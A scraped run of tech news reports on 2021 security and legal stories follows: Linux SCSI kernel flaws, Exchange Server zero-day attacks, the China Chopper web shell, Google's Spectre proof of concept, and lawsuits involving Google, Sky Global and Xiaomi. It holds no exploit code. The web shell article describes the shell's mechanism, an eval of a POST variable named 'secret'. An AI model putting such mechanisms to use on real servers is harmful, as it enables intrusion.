Information Technology

One of the good things about Linux is that it supports so much old hardware. With just a bit of work, there’s almost no computing hardware that can’t run Linux. That’s the good news. The bad news is that sometimes ancient security holes can be found within old programs. That’s the case with Linux’s Small Computer System Interface (SCSI) data transport driver.

A trio of security holes — CVE-2021-27365, CVE-2021-27363, and CVE-2021-27364 — was found by security company GRIMM researchers in an almost forgotten corner of the mainline Linux kernel. The first two of these have a Common Vulnerability Scoring System (CVSS) score above 7, which is high. While you may not have had a SCSI or iSCSI drive in ages, these 15 years old bugs are still around. One of them could be used in a Local Privilege Escalation (LPE) attack. In other words, a normal user could use them to become the root user.
Don’t let the word “local” fool you. As Adam Nichols, Principal of Software Security at GRIMM, said: “These issues make the impact of any remotely exploitable vulnerability more severe. Enterprises running publicly facing servers would be at the most risk.”
True, the vulnerable SCSI code isn’t loaded by default on most desktop distros. But it’s a different story on Linux servers. If your server needs RDMA (Remote Direct Memory Access), a high-throughput, low-latency networking technology, it’s likely to autoload the rdma-core Linux kernel module, which brings with it the vulnerable SCSI code. 
Whoops!
Exploiting the hole isn’t easy, but GRIMM has released a proof of concept exploit, which shows how to exploit two of the vulnerabilities. Now that the way has been shown you can count on attackers giving it a try. 
In particular, CentOS 8, Red Hat Enterprise Linux (RHEL) 8, and Fedora systems, where unprivileged users can automatically load the required modules if the rdma-core package is installed, are vulnerable. SUSE Linux Enterprise Server (SLES) can also be attacked. Ubuntu 18.04 and earlier are also open to attack.  And, of course, if you’re actually using SCSI or iSCSI drives you can be assaulted.

Fortunately, these bugs have already been patched. So, unless you like taking chances with your Linux servers, I’d advise you to patch your Linux distributions as soon as possible.
Related Stories: More

Any organisations which have yet to apply the critical updates to secure zero-day vulnerabilities in Microsoft Exchange Server are being urged to do so immediately to prevent what’s described as an ‘increasing range’ of hacking groups attempting to exploit unpatched networks.

Exchange attacks

An alert from the UK’s National Cyber Security Centre (NCSC) warns that all organisations using affected versions of Microsoft Exchange Server should apply the latest updates as a matter of urgency, in order to protect their networks from cyber attacks including ransomware.
The NCSC says it believes that over 3,000 Microsoft Exchange email servers used by organisations in the UK haven’t had the critical security patches applied, so remain at risk from cyber attackers looking to take advantage of the vulnerabilities. 
If organisations can’t install the updates, the NCSC recommends that untrusted connections to Exchange server port 443 should be blocked, while Exchange should also be configured so it can only be accessed remotely via a VPN.
It’s also recommended that all organisations which are using an affected version of Microsoft Exchange should proactively search their systems for signs of compromise, in case attackers have been able to exploit the vulnerabilities before the updates were installed.
SEE: A winning strategy for cybersecurity (ZDNet special report) | Download the report as a PDF (TechRepublic)  
That’s because installing the update after being compromised will not automatically remove access for any cyber attackers that have already gained accessed. NCSC officials said they’ve helped detect and remove malware related to the attack from more than 2,300 machines at businesses in the UK. 

“We are working closely with industry and international partners to understand the scale and impact of UK exposure, but it is vital that all organisations take immediate steps to protect their networks,” said Paul Chichester, director for operations at the NCSC.
“Whilst this work is ongoing, the most important action is to install the latest Microsoft updates,” he added.
Microsoft first became aware of the Exchange vulnerabilities in January and issued patches to tackle them on March 2, with organisations told to apply them as soon as possible.
It’s thought that tens of thousands of organisations around the world have had their email servers compromised by the cyber attacks targeting Microsoft Exchange, potentially putting large amounts of sensitive information into the hands of hackers.
Cybersecurity researchers at Microsoft have attributed the campaign to a state-sponsored advanced persistent threat (APT) hacking group working out of China, dubbed Hafnium.
Since the emergence of the vulnerabilities, a number of state-sponsored and cyber criminal hacking groups have also rushed to target Microsoft Exchange servers in order to gain access before patches are applied.
Cyber criminals have even distributed a new form of ransomware – known as DearCry – designed specifically to target vulnerable Exchange servers, something which could cause a major problem for organisations which haven’t applied the latest Exchange security updates.
“Organisations should also be alive to the threat of ransomware and familiarise themselves with our guidance. Any incidents affecting UK organisations should be reported to the NCSC,” said Chichester.
MORE ON CYBERSECURITY More

Google has failed to have a proposed class-action lawsuit quashed that alleges the company violated user privacy by collecting data in Incognito browser modes. 

The lawsuit, originally filed in June 2020, claims that Google tracks and collects consumer browsing history, among other activities, even when Chrome’s Incognito or other privacy-based browser sessions are in use. 
Filed in the District Court of Northern California, the class-action complaint alleges that when an individual visits a web page served by Google services — such as plug-ins, Google Analytics, and Google Ad Manager — data is collected, no matter the browser mode. 
The lawsuit says that Google is “intercepting, tracking, and collecting communications” and harvesting the data of users without obtaining consent, as noted by sister site CNET.
In total, the class-action lawsuit is seeking $5 billion from Google and parent company Alphabet. 
While Google sought to have the lawsuit shut down, presiding US District Judge Lucy Koh dismissed the request on Friday, saying that the tech giant “did not notify users that Google engages in the alleged data collection while the user is in private browsing mode” in her ruling, as reported by Bloomberg.  
In a statement, a Google spokesperson said the company “strongly dispute[s] these claims” and will “defend ourselves vigorously against them.”

“As we clearly state each time you open a new Incognito tab, websites might be able to collect information about your browsing activity during your session,” the spokesperson added, with such warnings displayed, as below, when a new incognito session in Chrome is launched.

In October, Google became the target of an antitrust lawsuit filed by the US Department of Justice (DoJ). The US agency claims that Google holds an “illegal” monopoly over online search services and advertising, and further accused the firm of “exclusionary practices that are harmful to competition.”
Previous and related coverage
Have a tip? Get in touch via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Researchers have provided insight into China Chopper, a web shell used by the state-sponsored Hafnium hacking group.

Hafnium is a group of cyberattackers originating from China. The collective recently came into the spotlight due to Microsoft linking them to recent attacks exploiting four zero-day vulnerabilities — CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 — in Microsoft Exchange Server.
Microsoft says that Hafnium tends to strike targets in the United States, focusing on industries including defense, research, law, and higher education. While believed to be based in China, the group uses leased virtual private servers (VPS) in the US.
Due to the renewed interest in Hafnium, on Monday, Trustwave published an analysis of one of the group’s tools, China Chopper, which is a web shell widely used for post-exploitation activities. 
The web shell has been detected in Exchange Server-related attacks alongside DearCry ransomware deployment.
China Chopper is not new and has been in the wild for at least a decade. The tiny web shell — coming in at only four kilobytes (.PDF) — contains two key components; a web shell command-and-control (C2) client binary and a text-based web shell payload, the server component. 
“The text-based payload is so simple and short that an attacker could type it by hand right on the target server — no file transfer needed,” the team notes.

FireEye calls the tool a “slick little web shell that does not get enough exposure and credit for its stealth.”
There are different variants of China Chopper in the wild that are written in different languages — such as ASP, ASPX, PHP, JSP, and CFM — but they all have similar functions. The Active Server Page Extended (ASPX) variety, once it lands on a server already compromised via an exploit, for example, is typically no more than one line of code. 
Red Canary notes that the .aspx web shell names are generally made up of eight random characters. 
Upon examination of a China Chopper sample, Trustwave describes how when an HTTP POST request is made, the script calls the “eval” function to execute the string inside a POST request variable.
“The POST request variable is named “secret,” meaning any JScript contained in the “secret” variable will be executed on the server,” the researchers say. “JScript is implemented as an active scripting engine allowing the language to use ActiveX objects on the client it is running on. This can be and is abused by attackers to achieve reverse shells, file management, process execution, and much more.”
A client component of China Chopper is usually hosted on an attacker’s system to facilitate communication, which can be used for tasks such as running a virtual terminal to launch commands based on cmd.exe, downloading files, and executing other malicious scripts.
The researchers also noted corresponding .NET DLLs to China Chopper generated by ASP.NET runtime on compromised servers. 
TEMP.Periscope/Leviathan, APT41/Double Dragon, and Bronze Union, among other advanced persistent threat (APT) groups, have been connected to the use of this popular web shell in the past.
Red Canary has also identified a cluster of Microsoft Exchange Server attacks building from the use of this backdoor. Dubbed “Sapphire Pigeon,” multiple web shells are being dropped on compromised servers at different times — and in some cases, days before post-exploit activities begin. 
At least 10 APTs are thought to be exploiting the critical Exchange Server vulnerabilities, of which at least 82,000 servers remain unpatched, according to Microsoft. 
Last week, Check Point Research said the rate of attacks leveraging the vulnerabilities was doubling every two to three hours. 
Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Google has released a proof of concept (PoC) code to demonstrate the practicality of Spectre side-channel attacks against a browser’s JavaScript engine to leak information from its memory. 
Google in 2018 detailed two variants of Spectre, one of which – dubbed variant 1 (CVE-2017-5753) – concerned Javascript exploitation against browsers. Spectre targeted the process in modern CPUs called speculative execution to leak secrets such as passwords from one site to another malicious site.
SEE: Hiring Kit: Python developer (TechRepublic Premium)
Web developers can visit Google’s new page – at https://leaky.page – to see a demo of Spectre in JavaScript, a video demo on YouTube and a detailed write up of the PoC on GitHub. 
[embedded content]
Google released the PoC for developers of web applications to understand why it’s important to deploy application-level mitigations. At a high level, as detailed in a Google document on W3C, a developer’s “data must not unexpectedly enter an attacker’s process”.      
While the PoC demonstrates the JavaScript Spectre attack against Chrome 88’s V8 JavaScript engine on an Intel Core i7-6500U ‘Skylake’ CPU on Linux, Google notes it can easily be tweaked for other CPUs, browser versions and operating systems. It was even successful on Apple’s M1 Arm CPU with minor modifications. The attack can leak data at a rate of 1kB per second. 
The chief components of the PoC are a Spectre version 1 “gadget” or code that triggers attacker-controlled transient execution; and a side-channel or “a way to observe side effects of the transient execution”. 

“The web platform relies on the origin as a fundamental security boundary, and browsers do a pretty good job at preventing explicit leakage of data from one origin to another,” explained Google’s Mike West. 
“Attacks like Spectre, however, show that we still have work to do to mitigate implicit data leakage. The side-channels exploited through these attacks prove that attackers can read any data which enters a process hosting that attackers’ code. These attacks are quite practical today, and pose a real risk to users.”

While Google and other browser vendors have developed mitigations for Spectre, such as Site Isolation, they don’t prevent exploitation of Spectre, explain Stephen Röttger and Artur Janc, Google information security engineers. 
SEE: Cybercrime groups are selling their hacking skills. Some countries are buying
“Rather, [these mitigations] protect sensitive data from being present in parts of the memory from which they can be read by the attacker,” they note in a blogpost.  
“While operating system and web browser developers have implemented important built-in protections where possible (including Site Isolation with out-of-process iframes and Cross-Origin Read Blocking in Google Chrome, or Project Fission in Firefox), the design of existing web APIs still makes it possible for data to inadvertently flow into an attacker’s process,” they explain. 
Google has also released a new prototype Chrome extension called Spectroscope that scans an application to find resources that may require enabling additional defenses.  
Röttger and Janc note that the Variant 1 gadget can be mitigated at a software level. However, the V8 team has found that mitigation of Spectre Variant 4 or Speculative Store Bypass (SSB) is “simply infeasible in software”.   More

Microsoft is reportedly investigating a potential partner leak that could have exacerbated the current wave of attacks against Microsoft Exchange servers. 

The Redmond giant is examining whether potentially “sensitive information” required to conduct the attacks was obtained through “private disclosures it made with some of its security partners,” according to the Wall Street Journal. 
On March 2, Microsoft issued emergency patches to tackle four zero-day vulnerabilities in Microsoft Exchange Server which were being actively exploited in the wild. 
The critical bugs were disclosed privately in January, and since then, exploit usage has gained traction to the point researchers estimate that tens of thousands of businesses worldwide have been impacted.
The suspected state-sponsored Chinese hacking group Hafnium was originally attributed to exploitation of the zero-days. Now, however, proof-of-concept (PoC) code has been released and more advanced persistent threat (APT) groups are attempting to capitalize on the situation. Ransomware, too, is now being deployed in some attacks. 
It is PoC code that is also reportedly the subject of Microsoft’s latest investigation. Microsoft is examining whether concept attack code sent privately by the company to partners of the Microsoft Active Protections Program (Mapp) was leaked, whether deliberately or accidentally. 
PoC attack code was sent to antivirus and other cybersecurity firms on February 23, prior to patch release, to give partner companies information in advance. However, it appears that some of the tools used in connected attacks, starting a week later, have “similarities” to the private PoC, according to the publication. 

Approximately 80 organizations participate in the Mapp program. 
In a blog post dated March 12, Microsoft said that protecting vulnerable Exchange servers is now a “critical” issue and this is why the company recently released patches to also fix out-of-support versions of Exchange. 
However, applying patches isn’t enough as it will not eradicate existing infections. As a result, Microsoft also recommends investigating for signs of compromise on Exchange servers.
Microsoft is now working with RiskIQ to track the number of servers that are online-facing, unpatched, and still vulnerable to attack. As of March 12, approximately 82,000 servers are still yet to be updated. 
“Microsoft is deeply committed to supporting our customers against these attacks, to innovating on our security approach, and to partnering closely with governments and the security industry to help keep our customers and communities secure,” the company commented.
The Biden Administration has warned organizations that they have “hours, not days” to patch their systems. Private sector players have been invited to participate in a task force dedicated to investigating the situation. 
Update 12.32 pm GMT: A Microsoft spokesperson told ZDNet:
“We are looking at what might have caused the spike of malicious activity and have not yet drawn any conclusions. We have seen no indications of a leak from Microsoft related to this attack.”
Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0

Exchange attacks More

The indicted chief executive of the Sky Global encrypted chat service has claimed that accusations of his participation in criminal activity are an attempt to erode “the fundamental right to privacy.”

On Friday, the US Department of Justice (DoJ) revealed an indictment, filed in the Southern District of California, against Sky Global’s CEO, Jean-Francois Eap, as well as a former distributor of Sky Global devices, Thomas Herdman. 
US prosecutors claim the pair “knowingly and intentionally participated” in a criminal ring that distributed narcotics by facilitating the “sale and service of encrypted communications devices.”
The international distribution of heroin, cocaine, and methamphetamine is specifically mentioned in the complaint. 
The indictment, returned by a federal grand jury, accuses the pair of conspiracy to violate the federal Racketeer Influenced and Corrupt Organizations Act (RICO), and warrants have now been issued for their arrest. 
Canada-based Sky Global is a provider of custom handsets and the developer of Sky ECC, a subscription-based end-to-end encrypted messaging application. 
Last week, Europol announced that law enforcement had broken the encryption of the network and had used client communication records to initiate a criminal takedown on March 9, leading to a “large number of arrests” as well as the seizure of cash and drugs.

In its turn, Sky Global denied these claims, instead, blaming a “disgruntled” former reseller of Sky devices and a scheme to distribute a fake — and, therefore, insecure — version of the Sky ECC app via skyecc.eu. 
According to the US indictment, “Sky Global’s devices are specifically designed to prevent law enforcement from actively monitoring the communications between members of transnational criminal organizations involved in drug trafficking and money laundering,” and the vendor “guarantees that messages stored on its devices can and will be remotely deleted by the company if the device is seized by law enforcement or otherwise compromised.”
The DoJ alleges that Sky Global has made hundreds of millions of dollars in profit by “facilitating” criminal activity. 
Suzanne Turner, FBI Special Agent in Charge of the San Diego Field Office, said that the indictment is “another major strike against transnational crime.”
Eap and Herdman, both said to be in Vancouver, Canada, face a maximum penalty of life in prison if arrested and found guilty. 
In response, Eap published a statement on Sunday, claiming that he only found out about the US indictment through media reports. The CEO has branded the allegations as false, adding that the situation highlights the “erosion of the right to privacy.”
“Sky Global’s technology works for the good of all. It was not created to prevent the police from monitoring criminal organizations; it exists to prevent anyone from monitoring and spying on the global community,” Eap commented. “The indictment against me personally in the US is an example of the police and the government trying to vilify anyone who takes a stance against unwarranted surveillance.”
Furthermore, Eap says that he and his company are being “targeted” because they “build tools to protect the fundamental right to privacy.”
Over the coming days, the executive intends to put his efforts toward clearing his name of the allegations. 
“We do not condone illegal or unethical behavior by our partners or customers,” Eap says. “To brand anyone who values privacy and freedom of speech as a criminal is an outrage.”
Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

A US federal court has temporarily blocked the Department of Defense from placing restrictions on the ability for domestic companies to invest in Xiaomi.
The presiding judge, District Judge Rudolph Contreras, issued an initial injunction [PDF] over the weekend to temporarily stop Xiaomi from being added to the Communist Chinese military companies (CCMC) list.
Companies placed on the CCMC list are subject to a Donald Trump executive order that came into force in November last year. The executive order prohibits US persons from trading and investing in any of the listed companies and bans trading in any new companies once the US has placed the CCMC label on them.
The injunction was handed out as the judge found that Xiaomi was likely to suffer “irreparable harm” in the absence of the relief.
In making his decision, Contreras explained that the factors of Xiaomi’s stock price dropping by 9.5% since the CCMC designation, various banks including Morgan Stanley, JP Morgan Chase, and Goldman Sachs suspending trading of Xiaomi shares, and the company losing contracts around the world, when viewed together, indicated the company had already suffered “irreparable harm” as a result of the designation.
Contreras added that Defense’s memorandum, which is what led to Xiaomi being added to the CCMC list, was made on “shaky ground”.
“[The memorandum] does not explicitly identify the agency’s source of authority that governs the CCMC designation process, and when the memo does invoke the relevant statutory language, the excerpted language is quoted incorrectly. These errors do not inspire confidence in the fastidiousness of the agency’s decision-making process,” he said.

Xiaomi was placed onto the CCMC list in mid-January after Defense accused the company of “appearing to be [a] civilian entity” in order to procure advanced technologies in support of the modernisation goals of the Chinese military. 
Referring to these national security concerns, Contreras said he was “somewhat skeptical that weighty national security interests are actually implicated here”.
“Taken together, the Court concludes that Defendants have not made the case that the national security interests at stake here are compelling,” he wrote.
Since the new year, US entities, such as the New York Stock Exchange, have struggled to handle the consequences and interpretation of the CCMC list. Across the month of January, the exchange said it would delist a trio of Chinese telcos, before changing its mind, and then it reverted to its original decision.
Other Chinese companies currently on the list include Huawei, Hikvision, Inspur, Panda Electronics, and Semiconductor Manufacturing International Corporation.
In a statement, Xiaomi said it was pleased with the outcome, but would continue its legal fight with the Department of Defense until Xiaomi was officially taken off the CCMC list.
“We believe that the inclusion of Xiaomi in the list of Chinese military-related enterprises is an arbitrary and arbitrary decision, and the judge also agreed with it. We will continue to ask the court to finally rule that the decree is invalid for Xiaomi,” it said.
RELATED COVERAGE More